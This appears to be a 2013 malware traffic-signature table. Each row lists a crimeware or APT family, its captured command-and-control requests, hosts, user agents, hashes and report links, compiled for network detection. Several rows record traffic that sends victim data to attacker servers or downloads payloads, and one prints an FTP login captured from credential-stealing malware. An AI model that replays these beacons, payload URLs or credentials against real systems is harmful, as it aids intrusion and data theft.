http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 6/1/2013 | ||||
105 | 2013-06-06 | CRIME | Mutopy Downloader | GET | /d/conh11.jpg | /conh11.jpg | /d/conh11.jpg User-Agent: - Host: gettrial.store-apps.org Cache-Control: no-cache | User-Agent: - | 80 | 20A6EBF61243B760DD65F897236B6AD3 | http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 6/1/2013 | |||
106 | 2013-06-06 | CRIME | Mutopy Downloader initial callback | GET | /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4 | /protocol.php?p= | /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4 User-Agent: - Host: www.wholists.org Cache-Control: no-cache HTTP/1.1 200 OK Server: nginx Date: Mon, 27 May 2013 18:56:53 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 61 .."...+.......o...4...o...w...t...z...5...4...t...*...|...u...o...~...)...i...h...;...4...o...k.. | User-Agent: - | 80 | 20A6EBF61243B760DD65F897236B6AD3 | http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 6/1/2013 | |||
107 | 2013-06-06 | CRIME | Symmi Remote File Injector | GET | <p>/img/seek.cgi?lin=100&db=dfs <p>/ae1.php <p>/ggu.php <p>/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies | /seek.cgi?lin= /ae1.php /ggu.php | /img/seek.cgi?lin=100&db=dfs Accept: */* User-Agent: Mozilla/5.0 Host: seek4.run-stat.org Connection: Keep-Alive Cache-Control: no-cache /ae1.php Accept: */* User-Agent: Mozilla/5.0 Host: bt.ads-runner.org Connection: Keep-Alive Cache-Control: no-cache /ggu.php Accept: */* User-Agent: Mozilla/5.0 Host: fw.point-up.org Connection: Keep-Alive Cache-Control: no-cache /wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies] Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 Host: [redacted victim wordpress cms] Content-Length: 484 Connection: Keep-Alive Cache-Control: no-cache lJtdmf=T2tpZzk5b2tpZ10xY29rZW1xQntjam1tLGFtbw==&evtrKd=CQRLEdhQu&miOLST=b3ZjNCxjbzIse2NqbW1mbHEsbGd2&dMXEq=PldRR1A8aXBrcXZjXW9jZmZtej4tV1FHUDwIPkxDT0c8IElwa3F2YyJPY2ZmbXogPi1MQ09HPAg%2B [snip] | User-Agent: Mozilla/5.0 | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | 7958f73daf4b84e3b00e008258ea2e7a | http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html | http://contagiodump.blogspot.com/2013/06/deepend-research-under-this-rock.html | http://bit.ly/crimepcaps | 6/1/2013 | |||
108 | 2013-06-06 | CRIME | Matsnu - MBR wiping ransomware | GET | /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP | /inbox.php?ltype=ld& | /0803&loc=0x0409&os=Windows%20XP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: nvufvwieg.com Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) | 1B2D2A4B97C7C2727D571BBF9376F54F | http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/ | 6/1/2013 | ||||||
109 | 2013-05-29 | CRIME | Adware Hotbar | POST | /vic.aspx?ver=4.0.1158.0&rnd=595937 | /vic.aspx?ver= | /vic.aspx?ver=4.0.1158.0&rnd=595937 Content-Type: application/x-www-form-urlencoded Filename: gUcmpCp User-Agent: NSIS_Inetc (Mozilla) Host: b.compqueue.com Content-Length: 276 Connection: Keep-Alive Cache-Control: no-cache epostdata=0c40ff4962816cc3e206edda1108327207ee080103baf1c6bb02c.... | NSIS_Inetc (Mozilla) | e8022373bc452ab06c49752ce20c5cc2 e7f41ba37a3c57dd31de45f0c1f855a1 d689f23246bd49b01bd30b5926e992ba | http://threatcenter.crdf.fr/?More&ID=145956&D=CRDF.AdWare.AdWare.Win32.HotBar553635795 | 2013-05 | ||||||
110 | 2013-05-29 | CRIME | Blackhole v2 | GET | /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622 | /q.php?kf= | /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 User-Agent: Java/1.7.0_10 Host: bandirmacatiemlak.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive | User-Agent: Java/1.7.0_10 | Request issued by the JRE itself (User-Agent: Java/1.7.0_10); an attempt is made to exploit a known vulnerability in the JDK. | 5/1/2013 | |||||||
111 | 2013-05-23 | CRIME | USteal.D | 220---------- Welcome to Pure-FTPd ---------- | 220---------- Welcome to Pure-FTPd ---------- 220-You are user number 1 of 100 allowed. 220-Local time is now 14:57. Server port: 21. 220-This is a private system - No anonymous login 220 You will be disconnected after 15 minutes of inactivity. USER 0jeck1072 331 User 0jeck1072 OK. Password required PASS q1w2e3r433590 230-User 0jeck1072 has group access to: 1002 | 21 | 2b796f11f15e8c73f8f69180cf74b39d | http://blogs.technet.com/b/mmpc/archive/2013/05/22/how-easily-usteal-my-passwords.aspx | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 3/1/2013 | ||||||
112 | 2013-05-23 | APT | Hangover Smackdown Minapro | GET | /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 | /snwd.php?tp= | Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C) Host: wreckmove.org Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C) | 02d6519b0330a34b72290845e7ed16ab bfd2529e09932ac6ca18c3aaff55bd79 | http://enterprise.norman.com/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | 5/1/2013 | ||||||
113 | 2013-05-16 | CRIME | Cutwail / Pushdo | POST | /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe | <p>/?ptrxcz_ <p>/?xclzve_ | /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe Accept: */* Accept-Language: en-us Content-Type: application/octet-stream Content-Length: 193 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: uakron.edu Connection: Keep-Alive Cache-Control: no-cache g.P#...#...#...$..5$...$...$7S.$^.3%xQf%...%.O.%...&.Md&...&;L.&U..'o.H'...'...'...(..F(.. .2..(O..(. ........\+..p,.z...u)t.?>.-.p'+.<Z+.n.+.:.+...,.9X, ..,G7.,a. -{.<-...-...-......:...m.> | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | Also can use xclzve instead of ptrxcz | 582de032477e099eb1024d84c73e98c1 | https://www.damballa.com/downloads/r_pubs/Damballa_mv20_case_study.pdf | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | Unicode appid\{27af75ed-20d9-11d1-b1ce-00805fc1270e} | 5/1/2013 | ||
114 | 2013-05-15 | APT | Mediana Proxy | GET | /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0 | /index.htm?n | Accept: */* Accept-Language: en-us Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: firewall.happytohell.com:80 X-HOST: n763t4OPmrs6fXq7fXp7uj16e-r Content-Length: 0 Proxy-Connection: Keep-Alive | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | dropped by 0AE47E3261EA0A2DBCE471B28DFFE007 CVE-2010-3333 | ECA344925AA188E6A26BB4B2E09C783C | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \system32\cmd.exe /c \command.com /c \msextlog.dll mslog \windns.dll InstalledSuccessful.ini No Startup item. level="asInvoker" level="requireAdministrator" \system32\dllcache\ dr.web HTTP/1.0 200 OK Date: Sun, 03 Aug 2003 13:41:30 GMT Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) Content-Length: %d | 10/1/2012 | |||
115 | 2013-05-15 | CRIME | Zeus | POST | <p>/orders2010.php <p>/busted.php | <p>/orders2010.php <p>/busted.php | Accept: */* Content-Type: application/x-www-form-urlencoded Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: mugspade.ru Content-Length: 76 Cache-Control: no-cache bn1=WIN7PRO_X86_000_74DEB1E36522DF69_26&sk1=C15CAF65F6280F4916AB79B669689A92 =========== Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: trapbath.ru Content-Length: 894 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | UPS DELIVERY CONFIRMATION ALERT APR2012.EXE | b1551c676a54e9127cd0e7ea283b92cc | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | |||||
116 | 2013-05-15 | CRIME | Gypthoy | POST | /opt/mainpage.php | /mainpage.php | Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: sonunigam.us Content-Length: 281 Connection: Keep-Alive Cache-Control: no-cache pcname=DELLXT&note=PO&country=&user=gurutoolz0803&log=%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe%0D%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0A%0D%0A | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | Arrives as attachment exe in zip. Drops decoy pdf (invoice) and VB binary Also checks ip /proxy/proxychecker/country.htm Host: www.samair.ru | 3ee49121300384ff3c82eb9a1f06f288 | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS%3AWin32%2FGypthoy.A#techdetails_link | <form method="POST" action=" http://www.samair.ru/proxy/proxychecker/country.htm Title body innerText \Mail1.htm v.exe putratS\smargorP\uneM tratS\swodniW\tfosorciM\gnimaoR\ataDppA show http://sonunigam.us/opt/mainpage.php http://www.sendsmsfree.co.uk/ht2.txt | 5/1/2013 | ||||
117 | 2013-05-14 | APT | Hupigon / Graybird | ........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.. | ........................................;...Windows XP 5.1 (2600.Service Pack 3)................................................................$...DELLXT.............................................................................................................................. 4s.love.......HACK.. | 8000 | 8F90057AB244BD8B612CD09F566EAC0C | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | DAREAMFORSS DOITANDILOVEU ILOVEU4EVER | 5/1/2013 | ||||||
118 | 2013-05-14 | APT | Variant Letsgo / TabMsgSQL downloader (comment crew) | GET | /index.htm | /index.htm | User-Agent: IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116) Accept: */* Host: mickeypluto.info Connection: Keep-Alive HTTP/1.1 200 OK Date: Tue, 19 Jul 2011 23:26:41 GMT Content-Length: 131 Content-Type: text/html Content-Location: http://mickeypluto.info/index.htm Last-Modified: Mon, 18 Jul 2011 08:22:34 GMT Accept-Ranges: bytes ETag: "ea835d82345cc1:15b981" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET <yahoo sb="CcNQ03px5eovHIwYjIdfgRzFURpvH8fqL8mv0JTF5EOoUJx8t62VCX@@(25043)"></yahoo> | IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116) | <yahoo ex=" is/was also common | b21ba443726385c11802a8ad731771c0 | http://intelreport.mandiant.com/ | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | tusgoz IPHONE8.5(hz /USERPROFILE7fxsz v{.DLLWI %://mhkeblu to.H8/t )(sle| c 7|`0 <yapo sy "></ >/ex a; bound&y=--MULTk I-PARTS-FORM-DATA-BOUNDY DiW 0 | 7/20/2011 | ||
119 | 2013-05-14 | APT | Tapaoux | GET | /ol/yahoo/banner4.php?jpg=../yahoo | /banner4.php?jpg=../yahoo | /ol/yahoo/banner4.php?jpg=../yahoo User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) Host: re.policy-forums.org | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) | 60AF79FB0BD2C9F33375035609C931CB | 8/23/2011 | |||||||
120 | 2013-05-13 | CRIME | Horst Proxy | GET | /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0 | /proxy.php?ip= | /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 User-Agent: Mozilla/5.0 Host: ldark.com HTTP/1.1 302 Found Date: Tue, 14 May 2013 02:49:49 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze15 Location: http://ww41.ldark.com/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 | Mozilla/5.0 | EFE5529D697174914938F4ABF115F762 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 5/1/2013 | |||||
121 | 2013-05-13 | CRIME | PassAlert | GET | /loader/bin/file1.exe | /bin/file1.exe | /loader/bin/file1.exe User-Agent: Mozilla/5.0 Host: porno-video-free.com | Mozilla/5.0 | B4A1368515C6C39ACEF63A4BC368EDB2 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 5/1/2013 | |||||
122 | 2013-05-12 | CRIME | Bitcoinminer | POST | / | / Authorization: Basic cXdlcnR5MTIzLjE6eA== Host: www2.x3x4.su:666 Accept-Encoding: deflate, gzip Content-Type: application/json Content-Length: 45 User-Agent: cpuminer 2.2.3 X-Mining-Extensions: midstate {"method": "getwork", "params": [], "id":0} HTTP/1.1 200 OK Server: nginx/1.2.1 Date: Sun, 12 May 2013 22:56:11 GMT Content-Type: application/json Content-Length: 635 Connection: keep-alive {"result": {"data": "000000017343cad1ae316260d1f2c262cc391443453a09fd8c8630e3bce86c47b3e476b73eaf9a0cf5eb36e74577ff3cb29f9267f5f300f252235ba77f47a9ea7aba6dba51901e351b6dcb6a00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000", "hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000", "midstate": "b1313289534677d23f93a6447a02047a09c369962cd1029393f5a2063368dcf2", "algorithm": "scrypt:1024,1,1", "target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff07000000"}, "id": 0, "error": null} | User-Agent: cpuminer 2.2.3 | 666 | 12E717293715939C5196E604591A97DF | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2013-05 | |||||
123 | 2013-05-12 | CRIME | Karagany Loader | GET | /user/go.php?html=do | /go.php?html=do | User-Agent: Opera/10.60 Presto/2.2.30 Host: mildpass.co.cc | User-Agent: Opera/10.60 Presto/2.2.30 | E6CBCEDD4D7150357312323B6F8EFA3F | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKaragany.I#techdetails_link | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 5/1/2013 | ||||
124 | 2013-05-12 | APT | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 | 122B34A05530316E919604EF52EB9F1A | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html | 5/1/2013 | - | |||||||
125 | 2013-05-12 | APT | IXESHE | GET | /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA x_bigfix_client_string: baQMyZrdqDAA | /AWS96.jsp? | /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA x_bigfix_client_string: baQMyZrdqDAA User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: freedream.strangled.net:443 Connection: Keep-Alive | User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) | 443 | 0F88D9B0D237B5FCDC0F985A548254F2 | spoolsv -=OK!=- Process Do not exit in 10 second, so i Kill it! | 5/1/2013 | |||||
126 | 2013-05-08 | APT2 | KoreanBanker DL | GET | /web/down/kbs.exe | /down/kbs.exe | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.colorephone.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | E50A715D3A16CBD57339DD4C8D4605C8 8C1B83D95394BB52921DF6A218ECCA61 | http://labs.alienvault.com/labs/index.php/2013/a-theory-on-the-south-korean-attacks/ http://www.theregister.co.uk/2013/03/20/south_korea_cyberattack/ | http://bit.ly/aptsamples | http://www.colorephone.com/web/down/DeleteAll.exe \DeleteAll.exe http://www.colorephone.com/web/down/LoginMgr.dll \LoginMgr.dll http://www.colorephone.com/web/down/ftp.exe \ftp.exe http://www.colorephone.com/web/down/kbs.exe \kbs.exe | 3/1/2013 | ||||
127 | 2013-05-05 | APT | Plugx | SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png | SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO46Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png | 443 | RTF 42fba80f105aa53dfbf50aeba2d73cae >> BIN 3C74A85C2CF883BD9D4B9F8B9746030F | http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/ http://espionageware.blogspot.com/2013/05/tracing-apt163qq.html | http://bit.ly/aptsamples | shenzhen1503 (from DigCert) guangdong1 Unicode %s\Sidebar.dll.doc --does not apply to all plugx var | 5/1/2013 | ||||||
128 | 2013-05-05 | CRIME | PowerLoader | POST | /postnuke/blog.php | /blog.php | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: real-newslife.com Content-Length: 84 Cache-Control: no-cache .............y..W.. ,.1xV.....>.V>59..5K.xdH.h@<............./..._.4W.%.i.Oh.M....4. | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) | Powerloader bot for Gapz or Redyms | PowerLoaderv1 CE8B6E20E0EE177174FCA864C7451731 PowerLoaderv1 D4D96F60F6723B8EC5F1677D4657BE83 PowerLoaderv2 7DE3350CAFBE8FE843AEA9E8564E6AF5 4497A231DA9BD0EEA327DDEC4B31DA12 - May 2013 | http://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | srvurls tid=%d&ta=%s-%x fid=%d %s|%d| POST srvretry %[^.].%[^(](%[^)]) buildid os=%s&bid=%s srvdelay | 5/1/2013 | ||
129 | 2013-05-05 | APT | RssFeeder (moved from TBD tab, common name still unknown) 2nd stage | POST | /orange/news.php | /news.php | Accept: / Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: killme.98.shoptupian.com Content-Length: 170 Connection: Keep-Alive Cache-Control: no-cache cstype=server&authname=servername&authpass=serverpass&hostname=DELLXT&ostype=Microsoft Windows XP Professional3&macaddr=00:0C:29:71:24:89&owner=two13&version=1.2.0&t=4841HTTP/1.1 200 OK Connection: close Date: Sun, 06 Jan 2013 05:47:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Content-type: text/css <div id="0a552b5a4352">{'command':[]}</div> | 68EE5FDA371E4AC48DAD7FCB2C94BAC7 | ~New /c %s %s /quiet /extract:%s wusa.exe Unicode: SkipIfPassed | 6/1/2012 | |||||||
130 | 2013-05-05 | APT | RssFeeder (moved from TBD tab, common name still unknown) initialGET | POST | /data/rss | /rss | /data/rss Accept: / User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5 Accept-Encoding: gzip, deflate Host: huming386.livejournal.com Connection: Keep-Alive HTTP/1.1 200 OK Server: GoatProxy 1.0 Date: Sun, 06 Jan 2013 05:49:06 GMT Content-Type: text/xml; charset=utf-8 Connection: keep-alive X-AWS-Id: ws30 Cache-Control: private, proxy-revalidate Content-Encoding: gzip Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ Vary: Accept-Encoding,ETag Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT Content-Length: 592 Accept-Ranges: bytes X-Varnish: 1502242906 1495326149 Age: 33018 X-VWS-Id: bil1-varn23 ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ X-Gateway: bil1-swlb07 X-Beta: http://varnish | 68EE5FDA371E4AC48DAD7FCB2C94BAC7 | ~New /c %s %s /quiet /extract:%s wusa.exe Unicode: SkipIfPassed | 6/1/2012 | |||||||
131 | 2013-05-05 | APT | Swami | GET | /im/linux.php | /linux.php | Host: www.maintechy.com Content-Length: 2281 Cache-Control: no-cache | 972c692625bd57f0c7264c9e048752f6 33A5B48073AE9A11EC2F26318D0C4721 | http://byt0r.blogspot.com/2012/06/quick-notes-wpct-action-plan-from.html | http://bit.ly/aptpcaps | 5/1/2013 | ||||||
132 | 2013-05-02 | CRIME | GameThief | GET | /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 | /get.asp?mac= | User-Agent: Google page Host: 198.105.210.180 Cache-Control: no-cache | Google page | ECBA0FEB36F9EF975EE96D1694C8164C 4e4ea8acc683bdd054e032f8a2895c74 | http://www.threatexpert.com/report.aspx?md5=ecba0feb36f9ef975ee96d1694c8164c | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 3/1/2013 | ||||
133 | 2013-05-02 | CRIME | Beebone downloader | GET | <p>/0/?f|-1813912965Admin <p>/a/76876332/1 | {random}.{domain}:{port}/{number}/{affiliate_id}|{hdserial}{username} /0/?f|-1813912965Admin /1/?b|-2020396961winxp /2/?f|-1396129654Guest /9/?a|-1312965453MyPC /0/?f|-2713912961Developer /0/?b|-5711296542Windows7 /1/?a|-1296545361Administrator /0/?f|-1813912965Admin a/76876332/1 /a/76876332/bb1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) | Random 41001 30980 8080 443 | http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fBeebone#techdetails_link | 2013-05 | |||||||
134 | 2013-05-02 | CRIME | Neutrino EK var | POST | /cxiqocvbqd | x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://thejegos. info/lkijppm?fqogndmmqm=7737359 Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: thejegos. info Content-Length: 769 Connection: Keep-Alive Cache-Control: no-cache pcnfjrcxxpu=gbdl nep&ivexxbpclutvfxs=%251C%2540%250C%2505%2SOAGJEwU%2558XR1%2502%2500%2505%250E%250Fw %2513%2504Z%255D%255D%250AU%2540%255E%2506%2501%2509L1R%2517%250E%2511%250B%2507%250B%2503EX%2S1FN% 250F%2501%251F%2505%2507%2538%251E%250B%2504%2514%2502%251OFVLT%2S4OKRH%2SSCBURK%2540%250E%250D% 2518%2504R%255D%250C%2511%2500%25021R%2501%250E%2505%251F%2506GJ%2509%2517%2508%2SOOBG%2501%2512% 2508%2507%25071%2511%2519%250A%2507FV%2500%2510%251C%2SOBNF%251E%2508%2504%251C8%2512%2508%250D% 2508%2SOEHN%251D%250C%251C%2511%2507%25163%2502%250C%2517%250F%2516FV%2500%2510%251C%2SOBNF%251A% 2502%2506R%255D%250C%2511%2500%25021R%2510%250F%2514NT%250B%2505%250B%250E%2519%2S11 | Mozilla/4.0 (compatible; MSIE 8.0; windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) | http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html | 4/1/2013 | ||||||||
135 | 2013-05-01 | APT | Comfoo / Vinself / Mspub | POST | /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/ | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, / Accept-Language: en-en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) Host: mail.lthreebox.com Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) | 69bb7612b2e6a0f647b3e9c93b0bf572 DA52D94C1F5D46F5C1F73D60DA04C53C | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf | http://bit.ly/aptsamples | 5. Disk Information! 4. Account Information! 3. System Time! 2. CPU Type! Unicode RDOMAIN RNAME | 4/7/2011 | |||||
136 | 2013-05-01 | APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f72b8 | /update?id= | Accept: / X-Session: 0 X-Status: 0 X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1) Host: localhost Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1) | 2385B332637DD37E4E5C79A1FED46171 | http://www.threatexpert.com/report.aspx?md5=2385b332637dd37e4e5c79a1fed46171 | http://bit.ly/aptsamples | GETPASSWORD1 RarSFX Svchost.exePK Presetup=c:\windows\ Silent=1 Unicode Shell.Explorer about:blank ASKNEXTVOL | 4/18/2013 | ||||
137 | 2013-05-01 | APT2 | Disttrack / Shamoon | GET | /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203 | /data.asp?mydata= | /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0 User-Agent: you | you | D214C717A357FE3A455610B197C390AA B14299FD4D1CBFB4CC7486D978398214 | http://vrt-blog.snort.org/2012/08/new-threat-disttrack.html | http://bit.ly/aptsamples | 8/1/2012 | |||||
